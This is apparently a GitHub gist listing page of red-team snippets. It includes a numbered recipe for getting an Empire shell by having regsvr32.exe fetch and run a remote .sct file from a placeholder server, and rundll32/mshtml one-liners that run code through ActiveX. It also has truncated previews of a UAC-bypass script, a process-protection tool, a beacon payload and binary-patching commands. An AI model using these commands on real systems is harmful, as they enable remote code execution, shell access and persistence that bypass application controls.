Nicholas McKinney nicholasmckinney
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1. Create Empire Listener | |
| 2. Generate Stager | |
| 3. Host Stager Code At Some URL | |
| 4. Host .sct File At Some URL | |
| 5. On host, execute regsvr32.exe /i:http://server/empire.sct scrobj.dll | |
| 6. Instanitate the Object. ( ex: $s=New-Object -COM "Empire";$s.Exec() ) | |
| -Or This rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();s=new%20ActiveXObject("Empire");s.Exec(); | |
| 7. Wait for Shell... |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| //Add For PowerShell Invocation | |
| using System.Collections.ObjectModel; | |
| using System.Management.Automation; | |
| using System.Management.Automation.Runspaces; |
nicholasmckinney
/ ProcessArmor.cs
Created
May 8, 2017 00:32
Process Armor - Prevent users from killing your service or process
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.ComponentModel; | |
| using System.Security.AccessControl; | |
| using System.Security.Principal; | |
| using System.Runtime.InteropServices; | |
| using System.Configuration.Install; | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <script Language = JavaScript> | |
| //----------------------------------------------------------------------------------------------- | |
| // adSiteInfo.js | |
| // | |
| //----------------------------------------------------------------------------------------------- | |
| var objADSysInfo = new ActiveXObject("ADSystemInfo"); | |
| var objNetwork = new ActiveXObject("WScript.Network"); | |
| var objRootDSE = null; |
nicholasmckinney
/ Invoke-WScriptBypassUAC-JS.ps1
Created
May 8, 2017 00:32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-WScriptBypassUAC | |
| { | |
| <# | |
| .SYNOPSIS | |
| Performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe. | |
| Author: @enigma0x3, @harmj0y, Vozzie | |
| License: BSD 3-Clause | |
| Required Dependencies: None |
nicholasmckinney
/ _commands.txt
Created
May 8, 2017 00:32
Basic Example of Binary Patching With MPatch.exe and APatch.exe
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Build Your Binaries | |
| c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe a.cs | |
| c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe b.cs | |
| c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe c.cs | |
| # Create Your Patch | |
| # You need Windows 7 SDK | |
| "C:\Program Files\Microsoft SDKs\Windows\v7.1\Bin\mpatch.exe" a.exe b.exe dbi_patch |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Net; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.Collections.Generic; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
nicholasmckinney
/ sample.cmd
Created
May 8, 2017 00:32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.Exec(\"calc\")"); |
nicholasmckinney
/ gist:3d748d6c3d7d52ce37479f7ef96a5478
Created
May 8, 2017 00:32
DynaCall Article Dr Dobbs, November 1998
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
|  | |
| An Automation Object for Dynamic DLL Calls | |
| Here's an OLE automation object for dynamically declaring and accessing functions in external DLLs | |
| November 01, 1998 URL:http://www.drdobbs.com/windows/an-automation-object-for-dynamic-dll-cal/210200078 Jeff Stong has been developing DOS, Windows, and Windows NT based applications for 10 years. Jeff can be contacted at [email protected]. | |
| You can access external DLLs from Visual Basic by using the Declare statement to declare the name of the function you want to call and the DLL that it resides in. VBScript, however, doesn't support the Declare statement. This article presents an OLE automation object that lets VBScript (or any other environment that can access automation objects) dynamically declare and access functions in external DLLs. | |
| Using the DynamicWrapper Object |
nicholasmckinney
/ beaconPayload.cs
Created
May 8, 2017 00:32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |